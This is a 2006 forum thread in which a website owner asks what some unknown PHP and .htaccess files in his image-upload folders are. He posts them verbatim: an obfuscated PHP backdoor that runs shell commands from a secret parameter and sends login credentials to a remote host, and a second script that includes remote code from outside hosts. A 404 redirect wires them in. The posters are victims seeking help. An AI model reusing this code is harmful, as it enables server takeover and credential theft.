pbjorge12 Posted July 1, 2006 Share Posted July 1, 2006 Hey...I'm a little worried about this odd problem that has begun to show up - Can anyone tell me what it means?Today I went through a folder of mine on my server called uploadedImages that stores images users uploaded. I check the mime type to prevent other files from being added...The strange thing was I found 2 .php files and a .htaccess file in each subfolder (thumb, smallThumb, and Full).I will include the "full" folder's files...base.php[code]<?phperror_reporting(0);if(isset($_POST["l"]) and isset($_POST["p"])){ if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));} else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}}else{$user_auth="";}if(!isset($_POST["log_flg"])){$log_flg="&log";}if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)){ if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);} if($_POST["l"]=="special"){print "sys_active". `uname -a`;}}?>[/code]Create.php[code]<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>[/code].htaccess[code]Options -MultiViewsErrorDocument 404 //uploadedImages/cover/full/create.php[/code]Note: Different file name's with different content were in eac folder...Note2: The files were created by "nobody" the default apache user...Is this normal? What is it? What is its purpose? Quote Link to comment Share on other sites More sharing options...
redarrow Posted July 1, 2006 Share Posted July 1, 2006 i dont know but i also got a .php files put in my folder one day and it outputted all my code within that folder.scary? Quote Link to comment Share on other sites More sharing options...
pbjorge12 Posted July 1, 2006 Author Share Posted July 1, 2006 Its VERY scary...If I don't get this figured out I'm gonna be up ALL night! Quote Link to comment Share on other sites More sharing options...
redarrow Posted July 1, 2006 Share Posted July 1, 2006 take away the [][] brackets to see the code larger ok Quote Link to comment Share on other sites More sharing options...
redarrow Posted July 1, 2006 Share Posted July 1, 2006 if you find that you havent done any valadation on users uploading the correct file exstention then post the upload revelent code.if you have done that read on!ok you made me paranoid know what i did 5 min ago is cheek the phpmyadmin for any databases that i didnt no off being mine you should take these steps.i had no extra ones thank god.know what i understand is that if a hacker got your mysql deatails then they can use your database for there own needs and in some cases also use a folder you didnt know about but the best pratice is to cheeck the database entrys and if there all yours lol............... your ok you can sleep tonight ok.butin the worse sititation and a person has leached onto your database then you have to reset the passwords on all your scripts and database ok.and then delete any unknown folders and files .i would sugest a fresh copy of everthink ok.scary good luck. Quote Link to comment Share on other sites More sharing options...
pbjorge12 Posted July 1, 2006 Author Share Posted July 1, 2006 Well...After doing some reasearch this is an exploit that works with directories with 777 permissions (Which mine is).I am still looking for a fix... Quote Link to comment Share on other sites More sharing options...
redarrow Posted July 1, 2006 Share Posted July 1, 2006 exsplain more what do you mead an exsploit what they get in 777 folders how?lol you make me more worried? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.